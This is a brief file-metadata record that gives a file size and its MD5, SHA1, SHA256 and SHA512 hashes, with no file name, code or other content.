2.9MB
MD51976cb5215470bbbfe6ea766aa2b9253
SHA1a9c899dbc512a5e8356731d4b1804fcbe4f6101b
SHA256dbcc095aa748c9400b3a81781f44dab6cdead04f9abbc5612a49f156c2df3aff
SHA512d6a904f2b0526435179d6d21b2d4021023451dbce44be4308cc83a6fd9d416be74fac0e4f1734005dc53d466b4dc734086ef97d59a2b6783a6d1f66f646be4b3